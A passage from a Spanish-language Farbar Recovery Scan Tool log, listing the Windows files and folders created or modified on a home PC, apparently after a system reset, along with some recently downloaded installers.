C:\WINDOWS\SysWOW64\icsxml 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\GroupPolicyUsers 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\downlevel 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Bthprops 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AppLocker 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SystemApps 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\winevt 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\ti-et 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\ta-lk 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\ta-in 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\si-lk 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\ShellExperiences 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\SecureBootUpdates 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\ras 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\ProximityToast 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\PointOfService 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\osa-Osge-001 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\NDF 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\my-mm 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\MsDtc 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\Macromed 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\Keywords 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\Ipmi 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\InputMethod 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\inetsrv 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\IME 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\icsxml 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\ias 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\Hydrogen 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\GroupPolicyUsers 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\GroupPolicy 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\ff-Adlm-SN 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\DriverState 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\Drivers\mde 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\Drivers\DriverData 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\downlevel 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\DDFs 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\ContainerSettingsProviders 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\config\TxR 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\config\systemprofile 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\config\RegBack 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\config\Journal 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\compatrel 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\Bthprops 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\appraiser 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\AppLocker 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\am-et 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\System 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SKB 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\ShellExperiences 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\ShellComponents 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\security 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\schemas 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\SchCache 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\Resources 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\rescache 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\RemotePackages 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\Registration 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\Provisioning 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\PLA 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\Performance 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\ModemLogs 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\L2Schemas 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\InputMethod 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\InboxApps 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\IdentityCRL 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\Globalization 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\GameBarPresenceWriter 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\DiagTrack 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\Cursors 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\Branding 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\bcastdvr 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\ProgramData\WindowsHolographicDevices 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\ProgramData\USOShared 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\Program Files\Windows Security 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\Program Files\Windows Portable Devices 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\Program Files\Windows Multimedia Platform 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\Program Files\ModifiableWindowsApps 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\Program Files\Common Files\Services 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\Program Files (x86)\Windows Portable Devices 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\Program Files (x86)\Windows Multimedia Platform 2025-08-08 01:14 - 2025-08-08 01:14 - 000000000 ____D C:\inetpub 2025-08-08 01:14 - 2025-08-08 01:13 - 000017635 _____ C:\WINDOWS\system32\Drivers\etc\services 2025-08-08 01:14 - 2025-08-08 01:13 - 000003103 _____ C:\WINDOWS\SysWOW64\mmc.exe.config 2025-08-08 01:14 - 2025-08-08 01:13 - 000003103 _____ C:\WINDOWS\system32\mmc.exe.config 2025-08-08 01:14 - 2025-08-08 01:13 - 000001358 _____ C:\WINDOWS\system32\Drivers\etc\protocol 2025-08-08 01:14 - 2025-08-08 01:13 - 000000858 _____ C:\WINDOWS\system32\DefaultQuestions.json 2025-08-08 01:14 - 2025-08-08 01:13 - 000000407 _____ C:\WINDOWS\system32\Drivers\etc\networks 2025-08-08 01:14 - 2025-08-08 00:46 - 000000000 ____D C:\WINDOWS\SystemTemp 2025-08-08 01:14 - 2025-08-08 00:45 - 000000000 ____D C:\Program Files\Windows NT 2025-08-08 01:14 - 2025-08-08 00:43 - 000000000 __RHD C:\Users\Public\Libraries 2025-08-08 01:14 - 2025-08-08 00:43 - 000000000 ____D C:\Users\Default\AppData\Roaming\Microsoft\Windows 2025-08-08 01:14 - 2025-08-08 00:34 - 000000000 ____D C:\WINDOWS\ServiceState 2025-08-08 01:13 - 2025-08-08 05:30 - 000000000 ____D C:\WINDOWS\INF 2025-08-08 01:11 - 2025-08-08 02:12 - 000000000 ____D C:\WINDOWS\CbsTemp 2025-08-08 01:09 - 2025-08-08 02:12 - 000000000 ____D C:\WINDOWS\servicing 2025-08-08 01:09 - 2025-08-08 01:14 - 000000000 ____D C:\WINDOWS\system32\SMI 2025-08-08 01:09 - 2025-08-08 01:09 - 000008192 _____ C:\WINDOWS\system32\config\ELAM 2025-08-08 01:09 - 2025-08-08 00:39 - 074186752 _____ C:\WINDOWS\system32\config\SOFTWARE 2025-08-08 01:09 - 2025-08-08 00:39 - 012320768 _____ C:\WINDOWS\system32\config\SYSTEM 2025-08-08 01:09 - 2025-08-08 00:39 - 000524288 _____ C:\WINDOWS\system32\config\DEFAULT 2025-08-08 01:09 - 2025-08-08 00:39 - 000131072 _____ C:\WINDOWS\system32\config\SAM 2025-08-08 01:09 - 2025-08-08 00:39 - 000065536 _____ C:\WINDOWS\system32\config\BBI 2025-08-08 01:09 - 2025-08-08 00:39 - 000032768 _____ C:\WINDOWS\system32\config\SECURITY 2025-08-08 00:49 - 2025-08-08 05:30 - 001767398 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2025-08-08 00:45 - 2025-08-08 05:26 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd 2025-08-08 00:45 - 2025-08-08 02:01 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2025-08-08 00:45 - 2025-08-08 00:45 - 000003712 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA{97AB6888-7CBB-4553-8393-63E9F34EE353} 2025-08-08 00:45 - 2025-08-08 00:45 - 000003586 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore{43520254-A601-43F3-9900-8617EE27D3D8} 2025-08-08 00:45 - 2025-08-08 00:45 - 000000000 _SHDL C:\Users\Default\AppData\Local\Historial 2025-08-08 00:45 - 2025-08-08 00:45 - 000000000 _SHDL C:\Users\Default\AppData\Local\Datos de programa 2025-08-08 00:45 - 2025-08-08 00:45 - 000000000 _SHDL C:\Users\Default\AppData\Local\Archivos temporales de Internet 2025-08-08 00:45 - 2025-08-08 00:45 - 000000000 _SHDL C:\Users\Default User 2025-08-08 00:45 - 2025-08-08 00:45 - 000000000 _SHDL C:\Users\All Users 2025-08-08 00:45 - 2025-08-08 00:45 - 000000000 _SHDL C:\ProgramData\Plantillas 2025-08-08 00:45 - 2025-08-08 00:45 - 000000000 _SHDL C:\ProgramData\Menú Inicio 2025-08-08 00:45 - 2025-08-08 00:45 - 000000000 _SHDL C:\ProgramData\Escritorio 2025-08-08 00:45 - 2025-08-08 00:45 - 000000000 _SHDL C:\ProgramData\Documentos 2025-08-08 00:45 - 2025-08-08 00:45 - 000000000 _SHDL C:\ProgramData\Datos de programa 2025-08-08 00:45 - 2025-08-08 00:45 - 000000000 _SHDL C:\Program Files\Archivos comunes 2025-08-08 00:43 - 2025-08-08 00:43 - 000034554 _____ C:\Users\Asus\Desktop\Aplicaciones quitadas.html 2025-08-08 00:43 - 2025-08-08 00:43 - 000000000 ____D C:\Users\Asus\AppData\Roaming\Microsoft\SystemCertificates 2025-08-08 00:43 - 2025-08-08 00:43 - 000000000 ____D C:\Users\Asus\AppData\Roaming\Microsoft\Crypto 2025-08-08 00:37 - 2025-08-08 02:05 - 000002352 _____ C:\Users\Asus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2025-08-08 00:37 - 2025-08-08 02:02 - 000000000 ____D C:\Users\Asus\AppData\Roaming\Microsoft\Windows 2025-08-08 00:37 - 2025-08-08 02:02 - 000000000 ____D C:\Users\Asus 2025-08-08 00:37 - 2025-08-08 00:37 - 000000000 _SHDL C:\Users\Asus\Reciente 2025-08-08 00:37 - 2025-08-08 00:37 - 000000000 _SHDL C:\Users\Asus\Plantillas 2025-08-08 00:37 - 2025-08-08 00:37 - 000000000 _SHDL C:\Users\Asus\Mis documentos 2025-08-08 00:37 - 2025-08-08 00:37 - 000000000 _SHDL C:\Users\Asus\Menú Inicio 2025-08-08 00:37 - 2025-08-08 00:37 - 000000000 _SHDL C:\Users\Asus\Impresoras 2025-08-08 00:37 - 2025-08-08 00:37 - 000000000 _SHDL C:\Users\Asus\Entorno de red 2025-08-08 00:37 - 2025-08-08 00:37 - 000000000 _SHDL C:\Users\Asus\Documents\Mis vídeos 2025-08-08 00:37 - 2025-08-08 00:37 - 000000000 _SHDL C:\Users\Asus\Documents\Mis imágenes 2025-08-08 00:37 - 2025-08-08 00:37 - 000000000 _SHDL C:\Users\Asus\Documents\Mi música 2025-08-08 00:37 - 2025-08-08 00:37 - 000000000 _SHDL C:\Users\Asus\Datos de programa 2025-08-08 00:37 - 2025-08-08 00:37 - 000000000 _SHDL C:\Users\Asus\Configuración local 2025-08-08 00:37 - 2025-08-08 00:37 - 000000000 _SHDL C:\Users\Asus\AppData\Roaming\Microsoft\Windows\Start Menu\Programas 2025-08-08 00:37 - 2025-08-08 00:37 - 000000000 _SHDL C:\Users\Asus\AppData\Local\Historial 2025-08-08 00:37 - 2025-08-08 00:37 - 000000000 _SHDL C:\Users\Asus\AppData\Local\Datos de programa 2025-08-08 00:37 - 2025-08-08 00:37 - 000000000 _SHDL C:\Users\Asus\AppData\Local\Archivos temporales de Internet 2025-08-08 00:36 - 2025-08-08 00:37 - 000000000 ____D C:\Program Files\Razer 2025-08-08 00:36 - 2025-08-08 00:36 - 000000000 ____D C:\ProgramData\Package Cache 2025-08-08 00:35 - 2025-08-08 00:46 - 000002278 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk 2025-08-08 00:34 - 2025-08-08 02:02 - 000000000 ____D C:\ProgramData\NVIDIA Corporation 2025-08-08 00:34 - 2025-08-08 02:02 - 000000000 ____D C:\ProgramData\NVIDIA 2025-08-08 00:34 - 2025-08-08 00:37 - 000000000 ____D C:\ProgramData\Razer 2025-08-08 00:34 - 2025-08-08 00:34 - 000000000 ____D C:\WINDOWS\system32\lxss 2025-08-08 00:34 - 2025-08-08 00:34 - 000000000 ____D C:\WINDOWS\system32\Drivers\NVIDIA Corporation 2025-08-08 00:34 - 2025-08-08 00:34 - 000000000 ____D C:\ProgramData\ASUS 2025-08-08 00:30 - 2025-08-08 05:26 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2025-08-08 00:30 - 2025-08-08 01:58 - 001097624 _____ C:\WINDOWS\system32\AsusUpdateCheck.exe 2025-08-08 00:30 - 2025-08-08 00:30 - 000262832 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2025-08-08 00:26 - 2025-08-08 01:58 - 001136496 _____ C:\WINDOWS\system32\wpbbin.exe 2025-08-08 00:02 - 2025-08-08 01:30 - 000000000 ___HD C:\$SysReset 2025-08-07 23:49 - 2025-08-07 23:49 - 002409472 _____ (Farbar) C:\Users\Asus\Downloads\FRST64.exe 2025-08-07 22:30 - 2025-08-07 22:30 - 000000006 _____ C:\Users\Asus\.node_repl_history 2025-08-07 20:42 - 2025-08-07 20:42 - 003629536 _____ (AVG Technologies CZ) C:\Users\Asus\Downloads\avg_remover_neshta.exe 2025-08-07 20:07 - 2025-08-07 20:07 - 000023734 _____ C:\WINDOWS\SysWOW64\IntegratedServicesRegionPolicySet.json 2025-08-07 20:07 - 2025-08-07 20:07 - 000023734 _____ C:\WINDOWS\system32\IntegratedServicesRegionPolicySet.json 2025-08-05 19:03 - 2025-08-05 19:03 - 107226856 _____ (Discord Inc.) C:\Users\Asus\Downloads\DiscordSetup.exe 2025-08-01 21:02 - 2025-08-01 21:02 - 004428992 _____ () C:\Users\Asus\Desktop\OperaGXSetup.exe 2025-08-01 20:57 - 2025-08-01 20:57 - 002179968 _____ (Overwolf Ltd.) C:\Users\Asus\Desktop\iTero Drafting Coach - Installer.exe 2025-08-01 18:44 - 2025-08-01 18:44 - 000001627 _____ C:\Users\Public\Desktop\VALORANT.lnk 2025-08-01 16:57 - 2025-08-01 16:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Herramientas de Microsoft Office 2025-07-30 17:37 - 2025-08-08 01:23 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TradingView 2025-07-30 17:37 - 2025-07-30 17:37 - 000001966 _____ C:\Users\Public\Desktop\TradingView.lnk 2025-07-16 18:56 - 2025-07-16 18:57 - 000001681 _____ C:\Users\Public\Desktop\League of Legends.lnk ==================== Un mes (modificado) ================== (Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.) 2025-08-08 02:04 - 2022-03-26 11:10 - 000000000 ___RD C:\Users\Asus\OneDrive 2025-08-08 02:02 - 2022-03-26 11:09 - 000000000 __RHD C:\Users\Public\AccountPictures 2025-08-08 02:02 - 2022-03-26 11:09 - 000000000 ___RD C:\Users\Asus\3D Objects 2025-08-08 01:58 - 2022-03-26 11:04 - 000008192 ___SH C:\DumpStack.log.tmp 2025-08-08 01:23 - 2023-03-23 12:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\V-Ray for SketchUp 2025-08-08 01:23 - 2022-03-26 14:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Riot Games 2025-08-08 01:19 - 2025-04-30 18:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IBM SPSS Statistics 2025-08-08 01:19 - 2023-03-23 12:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chaos 2025-08-08 01:19 - 2022-04-04 15:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chaos Group 2025-08-08 01:19 - 2022-03-26 23:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeMeter 2025-08-08 01:19 - 2022-03-26 22:44 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoCAD 2022 - English 2025-08-08 01:19 - 2022-03-26 22:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk 2025-08-08 00:46 - 2022-03-26 11:04 - 000002440 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2025-08-08 00:43 - 2023-03-23 12:53 - 000000000 ____D C:\Users\Asus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chaos Group 2025-08-08 00:37 - 2025-01-12 14:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Razer 2025-08-07 22:10 - 2023-08-22 17:04 - 000000000 ____D C:\Intel 2025-08-05 19:04 - 2022-03-26 11:18 - 000000000 ____D C:\Users\Asus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc 2025-07-16 18:56 - 2022-03-26 14:43 - 000000000 ____D C:\Riot Games ==================== SigCheck ============================ (No existe una corrección automática para los archivos que no pasan la verificación.) ==================== Final de FRST.txt ========================